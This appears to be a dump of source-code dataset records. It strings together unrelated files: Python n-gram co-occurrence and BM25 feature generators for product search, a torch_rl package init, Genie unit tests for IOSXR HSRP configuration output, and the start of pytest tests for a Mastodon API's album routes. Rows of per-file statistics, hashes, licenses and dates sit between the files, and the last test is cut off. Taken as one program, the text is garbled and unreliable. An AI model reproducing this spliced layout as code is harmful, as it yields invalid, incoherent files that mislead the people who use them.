        elif isinstance(self.aggregation_mode, list):
            feat_name = ["StatCoocNormTF_%s_%s"%(
                self.ngram_str, string.capwords(m)) for m in self.aggregation_mode]
        return feat_name
    def transform_one(self, obs, target, id):
        """Return, per obs ngram, fuzzy match count / len(target ngrams)."""
        obs_tokens = nlp_utils._tokenize(obs, token_pattern)
        target_tokens = nlp_utils._tokenize(target, token_pattern)
        obs_ngrams = ngram_utils._ngrams(obs_tokens, self.ngram)
        target_ngrams = ngram_utils._ngrams(target_tokens, self.ngram)
        val_list = []
        for w1 in obs_ngrams:
            s = 0.
            for w2 in target_ngrams:
                if dist_utils._is_str_match(w1, w2, self.str_match_threshold):
                    s += 1.
            # _try_divide guards against an empty target ngram list
            val_list.append(np_utils._try_divide(s, len(target_ngrams)))
        if len(val_list) == 0:
            val_list = [config.MISSING_VALUE_NUMERIC]
        return val_list
# ------------------------------ TFIDF -----------------------------------
# StatCooc stands for StatisticalCooccurrence
class StatCoocTFIDF_Ngram(BaseEstimator):
    """Single aggregation features.

    Co-occurrence TF-IDF: per obs ngram, the fuzzy match count in the target
    ngrams, weighted by a smoothed IDF computed over the target corpus.
    """
    def __init__(self, obs_corpus, target_corpus, ngram, aggregation_mode="",
        str_match_threshold=config.STR_MATCH_THRESHOLD):
        super().__init__(obs_corpus, target_corpus, aggregation_mode)
        self.ngram = ngram
        self.ngram_str = ngram_utils._ngram_str_map[self.ngram]
        self.str_match_threshold = str_match_threshold
        self.df_dict = self._get_df_dict()
    def __name__(self):
        # Feature name(s); aggregation_mode may be a str or a list of str.
        if isinstance(self.aggregation_mode, str):
            feat_name = "StatCoocTFIDF_%s_%s"%(
                self.ngram_str, string.capwords(self.aggregation_mode))
        elif isinstance(self.aggregation_mode, list):
            feat_name = ["StatCoocTFIDF_%s_%s"%(
                self.ngram_str, string.capwords(m)) for m in self.aggregation_mode]
        else:
            # Fix: previously an unsupported type fell through both branches
            # and raised UnboundLocalError on the return below.
            raise ValueError(
                "aggregation_mode must be a str or a list, got %r"
                % type(self.aggregation_mode))
        return feat_name
    def _get_df_dict(self):
        # Document frequency over target corpus with add-one smoothing
        # (every ngram starts at df=1, so _get_idf never divides by zero).
        d = defaultdict(lambda : 1)
        for target in self.target_corpus:
            target_tokens = nlp_utils._tokenize(target, token_pattern)
            target_ngrams = ngram_utils._ngrams(target_tokens, self.ngram)
            for w in set(target_ngrams):
                d[w] += 1
        return d
    def _get_idf(self, word):
        # BM25-style idf; self.N is presumably the corpus size set by
        # BaseEstimator -- not visible here, TODO confirm.
        return np.log((self.N - self.df_dict[word] + 0.5)/(self.df_dict[word] + 0.5))
    def transform_one(self, obs, target, id):
        """Return, per obs ngram, fuzzy match count * idf(obs ngram)."""
        obs_tokens = nlp_utils._tokenize(obs, token_pattern)
        target_tokens = nlp_utils._tokenize(target, token_pattern)
        obs_ngrams = ngram_utils._ngrams(obs_tokens, self.ngram)
        target_ngrams = ngram_utils._ngrams(target_tokens, self.ngram)
        val_list = []
        for w1 in obs_ngrams:
            s = 0.
            for w2 in target_ngrams:
                if dist_utils._is_str_match(w1, w2, self.str_match_threshold):
                    s += 1.
            val_list.append(s * self._get_idf(w1))
        if len(val_list) == 0:
            val_list = [config.MISSING_VALUE_NUMERIC]
        return val_list
# ------------------------------ Normalized TFIDF -----------------------------------
# StatCooc stands for StatisticalCooccurrence
class StatCoocNormTFIDF_Ngram(BaseEstimator):
    """Single aggregation features.

    Normalized co-occurrence TF-IDF: per obs ngram, (fuzzy match count /
    number of target ngrams) * smoothed IDF over the target corpus.
    """
    def __init__(self, obs_corpus, target_corpus, ngram, aggregation_mode="",
        str_match_threshold=config.STR_MATCH_THRESHOLD):
        super().__init__(obs_corpus, target_corpus, aggregation_mode)
        self.ngram = ngram
        self.ngram_str = ngram_utils._ngram_str_map[self.ngram]
        self.str_match_threshold = str_match_threshold
        self.df_dict = self._get_df_dict()
    def __name__(self):
        # Feature name(s); aggregation_mode may be a str or a list of str.
        if isinstance(self.aggregation_mode, str):
            feat_name = "StatCoocNormTFIDF_%s_%s"%(
                self.ngram_str, string.capwords(self.aggregation_mode))
        elif isinstance(self.aggregation_mode, list):
            feat_name = ["StatCoocNormTFIDF_%s_%s"%(
                self.ngram_str, string.capwords(m)) for m in self.aggregation_mode]
        return feat_name
    def _get_df_dict(self):
        # smoothing: every ngram starts at df=1 so idf never divides by zero
        d = defaultdict(lambda : 1)
        for target in self.target_corpus:
            target_tokens = nlp_utils._tokenize(target, token_pattern)
            target_ngrams = ngram_utils._ngrams(target_tokens, self.ngram)
            for w in set(target_ngrams):
                d[w] += 1
        return d
    def _get_idf(self, word):
        # BM25-style idf; self.N is presumably set by BaseEstimator -- not
        # visible here, TODO confirm.
        return np.log((self.N - self.df_dict[word] + 0.5)/(self.df_dict[word] + 0.5))
    def transform_one(self, obs, target, id):
        """Return, per obs ngram, normalized match count * idf(obs ngram)."""
        obs_tokens = nlp_utils._tokenize(obs, token_pattern)
        target_tokens = nlp_utils._tokenize(target, token_pattern)
        obs_ngrams = ngram_utils._ngrams(obs_tokens, self.ngram)
        target_ngrams = ngram_utils._ngrams(target_tokens, self.ngram)
        val_list = []
        for w1 in obs_ngrams:
            s = 0.
            for w2 in target_ngrams:
                if dist_utils._is_str_match(w1, w2, self.str_match_threshold):
                    s += 1.
            val_list.append(np_utils._try_divide(s, len(target_ngrams)) * self._get_idf(w1))
        if len(val_list) == 0:
            val_list = [config.MISSING_VALUE_NUMERIC]
        return val_list
# ------------------------ BM25 ---------------------------------------------
# StatCooc stands for StatisticalCooccurrence
class StatCoocBM25_Ngram(BaseEstimator):
    """Single aggregation features.

    Okapi BM25 co-occurrence score: per obs ngram, the fuzzy match count in
    the target ngrams, saturated by k1 and length-normalized by b against
    the average target ngram-document length.
    """
    def __init__(self, obs_corpus, target_corpus, ngram, aggregation_mode="",
        str_match_threshold=config.STR_MATCH_THRESHOLD, k1=config.BM25_K1, b=config.BM25_B):
        super().__init__(obs_corpus, target_corpus, aggregation_mode)
        self.k1 = k1
        self.b = b
        self.ngram = ngram
        self.ngram_str = ngram_utils._ngram_str_map[self.ngram]
        self.str_match_threshold = str_match_threshold
        self.df_dict = self._get_df_dict()
        self.avg_ngram_doc_len = self._get_avg_ngram_doc_len()
    def __name__(self):
        # Feature name(s); aggregation_mode may be a str or a list of str.
        if isinstance(self.aggregation_mode, str):
            feat_name = "StatCoocBM25_%s_%s"%(
                self.ngram_str, string.capwords(self.aggregation_mode))
        elif isinstance(self.aggregation_mode, list):
            feat_name = ["StatCoocBM25_%s_%s"%(
                self.ngram_str, string.capwords(m)) for m in self.aggregation_mode]
        return feat_name
    def _get_df_dict(self):
        # smoothing: every ngram starts at df=1 so idf never divides by zero
        d = defaultdict(lambda : 1)
        for target in self.target_corpus:
            target_tokens = nlp_utils._tokenize(target, token_pattern)
            target_ngrams = ngram_utils._ngrams(target_tokens, self.ngram)
            for w in set(target_ngrams):
                d[w] += 1
        return d
    def _get_idf(self, word):
        # BM25 idf; self.N is presumably set by BaseEstimator -- not visible
        # here, TODO confirm.
        return np.log((self.N - self.df_dict[word] + 0.5)/(self.df_dict[word] + 0.5))
    def _get_avg_ngram_doc_len(self):
        # Average number of ngrams per target document (BM25's avgdl).
        lst = []
        for target in self.target_corpus:
            target_tokens = nlp_utils._tokenize(target, token_pattern)
            target_ngrams = ngram_utils._ngrams(target_tokens, self.ngram)
            lst.append(len(target_ngrams))
        return np.mean(lst)
    def transform_one(self, obs, target, id):
        """Return, per obs ngram, its BM25 score against the target ngrams."""
        obs_tokens = nlp_utils._tokenize(obs, token_pattern)
        target_tokens = nlp_utils._tokenize(target, token_pattern)
        obs_ngrams = ngram_utils._ngrams(obs_tokens, self.ngram)
        target_ngrams = ngram_utils._ngrams(target_tokens, self.ngram)
        # K = k1 * (1 - b + b * |doc| / avgdl), the BM25 length normalizer
        K = self.k1 * (1 - self.b + self.b * np_utils._try_divide(len(target_ngrams), self.avg_ngram_doc_len))
        val_list = []
        for w1 in obs_ngrams:
            s = 0.
            for w2 in target_ngrams:
                if dist_utils._is_str_match(w1, w2, self.str_match_threshold):
                    s += 1.
            # classic BM25 term: idf * tf * (k1 + 1) / (tf + K)
            bm25 = s * self._get_idf(w1) * np_utils._try_divide(1 + self.k1, s + K)
            val_list.append(bm25)
        if len(val_list) == 0:
            val_list = [config.MISSING_VALUE_NUMERIC]
        return val_list
# ---------------------------- Main --------------------------------------
def main(which):
    """Generate the requested family of co-occurrence features.

    which -- one of "tf", "norm_tf", "tfidf", "norm_tfidf", "bm25".
    Unknown values leave the generator list empty, so nothing is produced
    (matching the original behavior).
    """
    logname = "generate_feature_stat_cooc_tfidf_%s_%s.log"%(which, time_utils._timestamp())
    logger = logging_utils._get_logger(config.LOG_DIR, logname)
    dfAll = pkl_utils._load(config.ALL_DATA_LEMMATIZED_STEMMED)
    generator_map = {
        "tf": StatCoocTF_Ngram,
        "norm_tf": StatCoocNormTF_Ngram,
        "tfidf": StatCoocTFIDF_Ngram,
        "norm_tfidf": StatCoocNormTFIDF_Ngram,
        "bm25": StatCoocBM25_Ngram,
    }
    generators = [generator_map[which]] if which in generator_map else []
    aggregation_mode = ["mean", "std", "max", "min", "median"]
    ## pass 1: query vs document fields, in both directions
    query_fields = ["search_term", "search_term_alt", "search_term_auto_corrected"][:1]
    doc_fields = ["product_title", "product_title_product_name", "product_description", "product_attribute", "product_brand", "product_color"]
    obs_fields_list = [query_fields, doc_fields]
    target_fields_list = [doc_fields, query_fields]
    for obs_fields, target_fields in zip(obs_fields_list, target_fields_list):
        for generator in generators:
            for ngram in [1, 2, 3]:
                param_list = [ngram, aggregation_mode]
                pf = PairwiseFeatureWrapper(generator, dfAll, obs_fields, target_fields, param_list, config.FEAT_DIR, logger)
                pf.go()
    ## pass 2: product-name fields only
    obs_fields_list = [["search_term_product_name"]]
    target_fields_list = [["product_title_product_name"]]
    for obs_fields, target_fields in zip(obs_fields_list, target_fields_list):
        for generator in generators:
            for ngram in [1, 2]:
                if ngram == 2:
                    # product_name is of length 2, so there is only one
                    # bigram and every aggregation gives the same value --
                    # "mean" alone suffices
                    param_list = [ngram, "mean"]
                else:
                    param_list = [ngram, aggregation_mode]
                pf = PairwiseFeatureWrapper(generator, dfAll, obs_fields, target_fields, param_list, config.FEAT_DIR, logger)
                pf.go()
# Usage: python feature_stat_cooc_tfidf.py <tf|norm_tf|tfidf|norm_tfidf|bm25>
if __name__ == "__main__":
    main(sys.argv[1])
| 42.323263
| 158
| 0.633093
| 1,728
| 14,009
| 4.770833
| 0.109954
| 0.042576
| 0.051553
| 0.037361
| 0.835517
| 0.81902
| 0.790636
| 0.784935
| 0.784935
| 0.778991
| 0
| 0.009805
| 0.242844
| 14,009
| 330
| 159
| 42.451515
| 0.767418
| 0.101506
| 0
| 0.729084
| 0
| 0
| 0.053413
| 0.019321
| 0
| 0
| 0
| 0
| 0
| 1
| 0.091633
| false
| 0
| 0.035857
| 0.011952
| 0.215139
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2aa20c6134f359ecbf6d2a9489ba36bf173e8e39
| 89
|
py
|
Python
|
torch_rl/torch_rl/utils/__init__.py
|
maximilianigl/rl-iter
|
73301871edfb5b513b2dbdac78a5817db97e8c7b
|
[
"MIT"
] | 10
|
2020-06-07T23:04:07.000Z
|
2021-12-03T07:11:34.000Z
|
torch_rl/torch_rl/utils/__init__.py
|
maximilianigl/rl-iter
|
73301871edfb5b513b2dbdac78a5817db97e8c7b
|
[
"MIT"
] | null | null | null |
torch_rl/torch_rl/utils/__init__.py
|
maximilianigl/rl-iter
|
73301871edfb5b513b2dbdac78a5817db97e8c7b
|
[
"MIT"
] | 1
|
2020-06-26T06:41:40.000Z
|
2020-06-26T06:41:40.000Z
|
from torch_rl.utils.dictlist import DictList
from torch_rl.utils.penv import ParallelEnv
| 29.666667
| 44
| 0.865169
| 14
| 89
| 5.357143
| 0.571429
| 0.24
| 0.293333
| 0.426667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089888
| 89
| 2
| 45
| 44.5
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
2ab8ecb542794cad1b4022f449e05abdd80fc8de
| 16,101
|
py
|
Python
|
pkgs/conf-pkg/src/genie/libs/conf/hsrp/iosxr/tests/test_hsrp.py
|
miott/genielibs
|
6464642cdd67aa2367bdbb12561af4bb060e5e62
|
[
"Apache-2.0"
] | null | null | null |
pkgs/conf-pkg/src/genie/libs/conf/hsrp/iosxr/tests/test_hsrp.py
|
miott/genielibs
|
6464642cdd67aa2367bdbb12561af4bb060e5e62
|
[
"Apache-2.0"
] | null | null | null |
pkgs/conf-pkg/src/genie/libs/conf/hsrp/iosxr/tests/test_hsrp.py
|
miott/genielibs
|
6464642cdd67aa2367bdbb12561af4bb060e5e62
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
'''
IOSXR unit tests for Genie Hsrp conf.
'''
# Python
import re
import unittest
from unittest.mock import Mock
# Genie
from genie.conf import Genie
from genie.conf.tests import TestCase
from genie.conf.base import Testbed, Device
from genie.libs.conf.hsrp.hsrp import Hsrp
from genie.libs.conf.interface import Interface
class test_hsrp_old(TestCase):
    """Unit tests for the legacy (old-style) Hsrp conf attributes on IOSXR.

    Each test sets attributes on the per-device/per-interface attr object,
    builds config/unconfig with apply=False and string-compares the result.
    """

    def setUp(self):
        """Create a fresh testbed, device, interface, and Hsrp object."""
        # Set Genie Tb
        testbed = Testbed()
        Genie.testbed = testbed
        # Device
        self.dev1 = Device(name='PE1', testbed=testbed, os='iosxr')
        # Interface
        self.intf1 = Interface(name='GigabitEthernet0/0/0/1', device=self.dev1)
        self.intf1.shutdown = False
        # Hsrp object
        self.hsrp1 = Hsrp()
        # Build config
        cfgs = self.intf1.build_config(apply=False)
        # Check config built correctly
        self.assertMultiLineEqual(
            str(cfgs),
            '\n'.join([
                'interface GigabitEthernet0/0/0/1',
                ' no shutdown',
                ' exit',
            ]))

    def test_cli_config1(self):
        """IPv4 group exercising the full set of old-style attributes."""
        # Apply configuration
        key = self.hsrp1.device_attr[self.dev1].interface_attr[self.intf1]
        key.bfd_min_interval = 30
        key.bfd_multiplier = 50
        key.minimum_delay = 5
        key.reload_delay = 10
        key.mac_refresh = 20
        key.use_bia = True
        key.redirect = True
        key.address_family = 'ipv4'
        key.version = 2
        key.group_number = 30
        key.ip_address = '192.168.1.254'
        key.authentication_word = 'cisco123'
        key.bfd_fast_detect = True
        key.mac_address = 'dead.beef.dead'
        key.group_name = 'gandalf'
        key.preempt = True
        key.preempt_minimum_delay = 5
        key.priority = 110
        key.hello_interval_seconds = 1
        key.holdtime_seconds = 3
        key.track_object = 1
        key.priority_decrement = 20
        # Build config
        cfgs = self.hsrp1.build_config(apply=False)
        # Check config built correctly
        self.assertMultiLineEqual(
            str(cfgs[self.dev1.name]),
            '\n'.join([
                'router hsrp',
                'interface GigabitEthernet0/0/0/1',
                ' hsrp bfd minimum-interval 30',
                ' hsrp bfd multiplier 50',
                ' hsrp delay minimum 5 reload 10',
                ' hsrp use-bia',
                ' hsrp redirect disable',
                ' hsrp mac-refresh 20',
                ' address-family ipv4',
                ' hsrp version 2',
                ' hsrp 30',
                ' address 192.168.1.254',
                ' authentication cisco123',
                ' bfd fast-detect',
                ' mac-address dead.beef.dead',
                ' name gandalf',
                ' preempt delay 5',
                ' priority 110',
                ' timers 1 3',
                ' track object 1 20',
                ' exit',
                ' exit',
                ' exit',
            ]))
        # Build unconfig
        cfgs = self.hsrp1.build_unconfig(apply=False)
        # Check config correctly unconfigured
        self.assertMultiLineEqual(
            str(cfgs[self.dev1.name]),
            '\n'.join([
                'no router hsrp',
                'interface GigabitEthernet0/0/0/1',
                ' no hsrp bfd minimum-interval 30',
                ' no hsrp bfd multiplier 50',
                ' no hsrp delay minimum 5 reload 10',
                ' no hsrp use-bia',
                ' no hsrp redirect disable',
                ' no hsrp mac-refresh 20',
                ' no address-family ipv4',
                ' exit',
            ]))

    def test_cli_config2(self):
        """IPv6 group with minimal attributes and msec timers."""
        # Apply configuration
        key = self.hsrp1.device_attr[self.dev1].interface_attr[self.intf1]
        key.address_family = 'ipv6'
        key.group_number = 5
        key.priority = 110
        key.preempt = True
        key.hello_interval_msec = 300
        key.holdtime_msec = 500
        # Build config
        cfgs = self.hsrp1.build_config(apply=False)
        # Check config built correctly
        self.assertMultiLineEqual(
            str(cfgs[self.dev1.name]),
            '\n'.join([
                'router hsrp',
                'interface GigabitEthernet0/0/0/1',
                ' address-family ipv6',
                ' hsrp 5',
                ' preempt',
                ' priority 110',
                ' timers msec 300 msec 500',
                ' exit',
                ' exit',
                ' exit',
            ]))
        # Build unconfig
        cfgs = self.hsrp1.build_unconfig(apply=False)
        # Check config correctly unconfigured
        self.assertMultiLineEqual(
            str(cfgs[self.dev1.name]),
            '\n'.join([
                'no router hsrp',
                'interface GigabitEthernet0/0/0/1',
                ' no address-family ipv6',
                ' exit',
            ]))

    def test_cli_config_args(self):
        """Hsrp objects built via constructor args for IPv6 and IPv4."""
        # create Hsrp conf by taking args
        hsrp1 = Hsrp(group_number=5, address_family = 'ipv6')
        # Apply configuration
        key = hsrp1.device_attr[self.dev1].interface_attr[self.intf1]
        key.priority = 110
        key.preempt = True
        key.hello_interval_msec = 300
        key.holdtime_msec = 500
        # Build config
        cfgs = hsrp1.build_config(apply=False)
        # Check config built correctly
        self.assertMultiLineEqual(
            str(cfgs[self.dev1.name]),
            '\n'.join([
                'router hsrp',
                'interface GigabitEthernet0/0/0/1',
                ' address-family ipv6',
                ' hsrp 5',
                ' preempt',
                ' priority 110',
                ' timers msec 300 msec 500',
                ' exit',
                ' exit',
                ' exit',
            ]))
        # Build unconfig
        cfgs = hsrp1.build_unconfig(apply=False)
        # Check config correctly unconfigured
        self.assertMultiLineEqual(
            str(cfgs[self.dev1.name]),
            '\n'.join([
                'no router hsrp',
                'interface GigabitEthernet0/0/0/1',
                ' no address-family ipv6',
                ' exit',
            ]))
        # create Ipv4 Hsrp conf by taking args
        hsrp2 = Hsrp(group_number=5)
        # Apply configuration
        key = hsrp2.device_attr[self.dev1].interface_attr[self.intf1]
        key.priority = 110
        key.preempt = True
        key.hello_interval_msec = 300
        key.holdtime_msec = 500
        # Build config
        cfgs = hsrp2.build_config(apply=False)
        # Check config built correctly
        self.assertMultiLineEqual(
            str(cfgs[self.dev1.name]),
            '\n'.join([
                'router hsrp',
                'interface GigabitEthernet0/0/0/1',
                ' address-family ipv4',
                ' hsrp 5',
                ' preempt',
                ' priority 110',
                ' timers msec 300 msec 500',
                ' exit',
                ' exit',
                ' exit',
            ]))
        # Build unconfig
        cfgs = hsrp2.build_unconfig(apply=False)
        # Check config correctly unconfigured
        self.assertMultiLineEqual(
            str(cfgs[self.dev1.name]),
            '\n'.join([
                'no router hsrp',
                'interface GigabitEthernet0/0/0/1',
                ' no address-family ipv4',
                ' exit',
            ]))
class test_hsrp(TestCase):
def setUp(self):
# Set Genie Tb
testbed = Testbed()
Genie.testbed = testbed
# Device
self.dev1 = Device(name='PE1', testbed=testbed, os='iosxr')
# Interface
self.intf1 = Interface(name='GigabitEthernet0/0/0/1', device=self.dev1)
self.intf1.shutdown = False
# Hsrp object
self.hsrp1 = Hsrp()
# Build config
cfgs = self.intf1.build_config(apply=False)
# Check config built correctly
self.assertMultiLineEqual(
str(cfgs),
'\n'.join([
'interface GigabitEthernet0/0/0/1',
' no shutdown',
' exit',
]))
def test_cli_config1(self):
# Apply configuration
key = self.hsrp1.device_attr[self.dev1].interface_attr[self.intf1]
key.bfd_interval = 30
key.bfd_detection_multiplier = 50
key.bfd_address = '192.168.1.2'
key.bfd_interface_name = 'GigabitEthernet0/0/0/1'
key.minimum_delay = 5
key.reload_delay = 10
key.mac_refresh = 20
key.use_bia = True
key.redirects_disable = True
key.address_family = 'ipv4'
key.version = 2
key.group_number = 30
key.primary_ipv4_address = '192.168.1.254'
key.secondary_ipv4_address = '192.168.1.253'
key.authentication = 'cisco123'
key.bfd_enabled = True
key.virtual_mac_address = 'dead.beef.dead'
key.session_name = 'gandalf'
key.preempt = True
key.priority = 110
key.hello_sec = 1
key.hold_sec = 3
key.tracked_object = 1
key.tracked_object_priority_decrement = 20
key.state_change_disable = True
# Build config
cfgs = self.hsrp1.build_config(apply=False)
# Check config built correctly
self.assertMultiLineEqual(
str(cfgs[self.dev1.name]),
'\n'.join([
'router hsrp',
'message state disable',
'interface GigabitEthernet0/0/0/1',
' hsrp bfd minimum-interval 30',
' hsrp bfd multiplier 50',
' hsrp delay minimum 5 reload 10',
' hsrp use-bia',
' hsrp redirect disable',
' hsrp mac-refresh 20',
' address-family ipv4',
' hsrp version 2',
' hsrp bfd fast-detect peer 192.168.1.2 GigabitEthernet0/0/0/1',
' hsrp 30',
' address 192.168.1.254',
' address 192.168.1.253 secondary',
' authentication cisco123',
' bfd fast-detect',
' mac-address dead.beef.dead',
' name gandalf',
' preempt',
' priority 110',
' timers 1 3',
' track object 1 20',
' exit',
' exit',
' exit',
]))
# Build unconfig
cfgs = self.hsrp1.build_unconfig(apply=False)
# Check config correctly unconfigured
self.assertMultiLineEqual(
str(cfgs[self.dev1.name]),
'\n'.join([
'no router hsrp',
'no message state disable',
'interface GigabitEthernet0/0/0/1',
' no hsrp bfd minimum-interval 30',
' no hsrp bfd multiplier 50',
' no hsrp delay minimum 5 reload 10',
' no hsrp use-bia',
' no hsrp redirect disable',
' no hsrp mac-refresh 20',
' no address-family ipv4',
' exit',
]))
def test_cli_config2(self):
# Apply configuration
key = self.hsrp1.device_attr[self.dev1].interface_attr[self.intf1]
key.address_family = 'ipv6'
key.global_ipv6_address = '2001:db8:1:1::254/64'
key.link_local_ipv6_address = 'fe80::205:73ff:fea0:19'
key.group_number = 5
key.priority = 110
key.preempt = True
key.hello_msec_flag = True
key.hello_msec = 300
key.hold_msec_flag = True
key.hold_msec = 500
key.tracked_interface = 'GigabitEthernet0/0/0/0'
key.tracked_intf_priority_decrement = 20
# Build config
cfgs = self.hsrp1.build_config(apply=False)
# Check config built correctly
self.assertMultiLineEqual(
str(cfgs[self.dev1.name]),
'\n'.join([
'router hsrp',
'interface GigabitEthernet0/0/0/1',
' address-family ipv6',
' hsrp 5',
' address global 2001:db8:1:1::254/64',
' address linklocal fe80::205:73ff:fea0:19',
' preempt',
' priority 110',
' timers msec 300 msec 500',
' track GigabitEthernet0/0/0/0 20',
' exit',
' exit',
' exit',
]))
# Build unconfig
cfgs = self.hsrp1.build_unconfig(apply=False)
# Check config correctly unconfigured
self.assertMultiLineEqual(
str(cfgs[self.dev1.name]),
'\n'.join([
'no router hsrp',
'interface GigabitEthernet0/0/0/1',
' no address-family ipv6',
' exit',
]))
def test_cli_config_args(self):
    """Hsrp group/address-family can be supplied as constructor arguments."""
    # --- IPv6 group built from constructor kwargs ---
    hsrp1 = Hsrp(group_number=5, address_family='ipv6')
    intf_cfg = hsrp1.device_attr[self.dev1].interface_attr[self.intf1]
    for attr, value in {
        'hsrp_linklocal': 'auto',
        'priority': 110,
        'preempt': True,
        'virtual_ip_learn': True,
        'hello_msec_flag': True,
        'hello_msec': 300,
        'hold_msec_flag': True,
        'hold_msec': 500,
    }.items():
        setattr(intf_cfg, attr, value)

    # Build config and check the rendered CLI.
    self.assertMultiLineEqual(
        str(hsrp1.build_config(apply=False)[self.dev1.name]),
        '\n'.join([
            'router hsrp',
            'interface GigabitEthernet0/0/0/1',
            ' address-family ipv6',
            ' hsrp 5',
            ' address learn',
            ' address linklocal autoconfig',
            ' preempt',
            ' priority 110',
            ' timers msec 300 msec 500',
            ' exit',
            ' exit',
            ' exit',
        ]))

    # Build unconfig and check the rendered CLI.
    self.assertMultiLineEqual(
        str(hsrp1.build_unconfig(apply=False)[self.dev1.name]),
        '\n'.join([
            'no router hsrp',
            'interface GigabitEthernet0/0/0/1',
            ' no address-family ipv6',
            ' exit',
        ]))

    # --- IPv4 group (default address-family) from constructor kwargs ---
    hsrp2 = Hsrp(group_number=5)
    intf_cfg = hsrp2.device_attr[self.dev1].interface_attr[self.intf1]
    for attr, value in {
        'priority': 110,
        'preempt': True,
        'hello_msec_flag': True,
        'hello_msec': 400,
        'hold_msec_flag': True,
        'hold_msec': 500,
        'follow': 'group10',
    }.items():
        setattr(intf_cfg, attr, value)

    # Build config and check the rendered CLI.
    self.assertMultiLineEqual(
        str(hsrp2.build_config(apply=False)[self.dev1.name]),
        '\n'.join([
            'router hsrp',
            'interface GigabitEthernet0/0/0/1',
            ' address-family ipv4',
            ' hsrp 5',
            ' slave follow group10',
            ' preempt',
            ' priority 110',
            ' timers msec 400 msec 500',
            ' exit',
            ' exit',
            ' exit',
        ]))

    # Build unconfig and check the rendered CLI.
    self.assertMultiLineEqual(
        str(hsrp2.build_unconfig(apply=False)[self.dev1.name]),
        '\n'.join([
            'no router hsrp',
            'interface GigabitEthernet0/0/0/1',
            ' no address-family ipv4',
            ' exit',
        ]))
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
| 31.883168
| 81
| 0.501894
| 1,625
| 16,101
| 4.875077
| 0.097846
| 0.028276
| 0.054532
| 0.052764
| 0.872128
| 0.8513
| 0.825297
| 0.816082
| 0.806488
| 0.806488
| 0
| 0.058166
| 0.399913
| 16,101
| 504
| 82
| 31.946429
| 0.761747
| 0.07956
| 0
| 0.842784
| 0
| 0
| 0.226598
| 0.038772
| 0
| 0
| 0
| 0
| 0.046392
| 1
| 0.020619
| false
| 0
| 0.020619
| 0
| 0.046392
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2ada022ad9b6d2ebd85535e9634d96389fff6c3a
| 7,200
|
py
|
Python
|
tests/test_app.py
|
perylemke/mastodon-api
|
cca61597b40971a464649b65ebb52d8098bb4f9c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_app.py
|
perylemke/mastodon-api
|
cca61597b40971a464649b65ebb52d8098bb4f9c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_app.py
|
perylemke/mastodon-api
|
cca61597b40971a464649b65ebb52d8098bb4f9c
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from httpx import AsyncClient
from asyncio import get_event_loop
from mastodon_api.app import app
@pytest.fixture(scope="module")
async def async_client():
    """Yield an httpx AsyncClient that calls the ASGI app in-process."""
    async with AsyncClient(app=app, base_url="http://test") as ac:
        yield ac
@pytest.fixture(scope="module")
def event_loop():
    """Module-scoped event loop so the module-scoped async fixture can share it.

    Fix: the original used ``get_event_loop()``, which is deprecated since
    Python 3.10 and may hand back a loop shared with (or already running in)
    other code; it also never closed the loop. Create a fresh loop and close
    it on teardown, per the pytest-asyncio documented pattern.
    """
    from asyncio import new_event_loop
    loop = new_event_loop()
    yield loop
    loop.close()
# Albums
@pytest.mark.asyncio
async def test_get_albums_code(async_client: AsyncClient) -> None:
    """Listing all albums returns HTTP 200."""
    res = await async_client.get("/api/albums/")
    assert res.status_code == 200
@pytest.mark.asyncio
async def test_get_albums_response_size(async_client: AsyncClient) -> None:
    """The album list is non-empty."""
    res = await async_client.get("/api/albums/")
    assert len(res.json()) > 0
@pytest.mark.asyncio
async def test_get_albums_with_right_id_code(async_client: AsyncClient) -> None:
    """Fetching album id 1 succeeds."""
    res = await async_client.get("/api/albums/1/")
    assert res.status_code == 200
@pytest.mark.asyncio
async def test_get_albums_with_right_id_response(async_client: AsyncClient) -> None:
    """Album id 1 is 'Remission'."""
    res = await async_client.get("/api/albums/1/")
    assert res.json()['name'] == 'Remission'
@pytest.mark.asyncio
async def test_get_albums_with_wrong_id_code(async_client: AsyncClient) -> None:
    """An id below the allowed minimum is rejected with 422."""
    res = await async_client.get("/api/albums/0/")
    assert res.status_code == 422
@pytest.mark.asyncio
async def test_get_albums_with_wrong_id_response(async_client: AsyncClient) -> None:
    """An out-of-range id yields the ge=1 validation error body."""
    expected = {
        'detail': [
            {
                'ctx': {'limit_value': 1},
                'loc': ['path', 'id'],
                'msg': 'ensure this value is greater than or equal to 1',
                'type': 'value_error.number.not_ge'
            }
        ]
    }
    res = await async_client.get("/api/albums/0/")
    assert res.json() == expected
@pytest.mark.asyncio
async def test_get_albums_by_valid_acronymous_code(async_client: AsyncClient) -> None:
    """Searching albums by a matching name fragment succeeds."""
    res = await async_client.get("/api/albums/?name=The")
    assert res.status_code == 200
@pytest.mark.asyncio
async def test_get_albums_by_valid_acronymous_response(async_client: AsyncClient) -> None:
    """The fragment 'The' matches more than one album."""
    res = await async_client.get("/api/albums/?name=The")
    assert len(res.json()) > 1
@pytest.mark.asyncio
async def test_get_albums_by_invalid_name_code(async_client: AsyncClient) -> None:
    """Searching for a name not in the catalog returns 404."""
